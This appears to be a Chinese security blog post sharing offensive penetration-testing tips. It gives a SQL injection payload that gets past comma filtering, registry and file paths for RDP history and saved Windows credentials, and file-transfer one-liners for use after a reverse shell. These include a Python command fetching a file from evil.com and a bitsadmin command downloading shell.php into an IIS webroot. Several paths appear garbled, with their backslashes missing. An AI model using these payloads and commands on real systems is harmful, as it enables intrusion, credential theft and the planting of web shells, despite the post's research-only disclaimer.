1233211234567

2021年11月18日23:19:53评论80 views字数 767阅读2分33秒阅读模式

分享几个tips，不记得哪里找的了。

注入过滤逗号

127' UNION SELECT * FROM ((SELECT1)a JOIN (SELECT2)b JOIN (SELECT3)c JOIN (SELECT4)d JOIN (SELECT5)e)#

相当于 union select 1,2,3,4,5

注册表查看rdp记录

[HKEY_USERSS-1-5-21-1387774393-1596258019-1651181295-500SoftwareMicrosoftTerminal Server ClientDefault]

C:Documents and SettingsAdministratorAppDataLocalMicrosoftCredentials

只反弹个shell，传文件

curl ，ftp，wget，nc

python -c 'import urllib;urllib.urlretrieve("http://evil.com/evil.file","/path/to/save/evil.file")'

nc 'BASE64' | base64 -d > xxx

powershell读写文件

读文本文件：

$file = Get-Content "1.txt"

写文本文件：

Set-content "1.txt" "wocao"

读二进制文件：

[System.IO.File]::ReadAllBytes('1.exe')

写二进制文件：

[System.IO.File]::WriteAllBytes("1.exe",$fileContentBytes)

下载文件

windows: bitsadmin /transfer n http://192.168.1.1/shell.php c:inetpubwwwrootshell.php

本文始发于微信公众号（关注安全技术）：1233211234567

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

清华大学 | 实网中多选项卡网站指纹攻击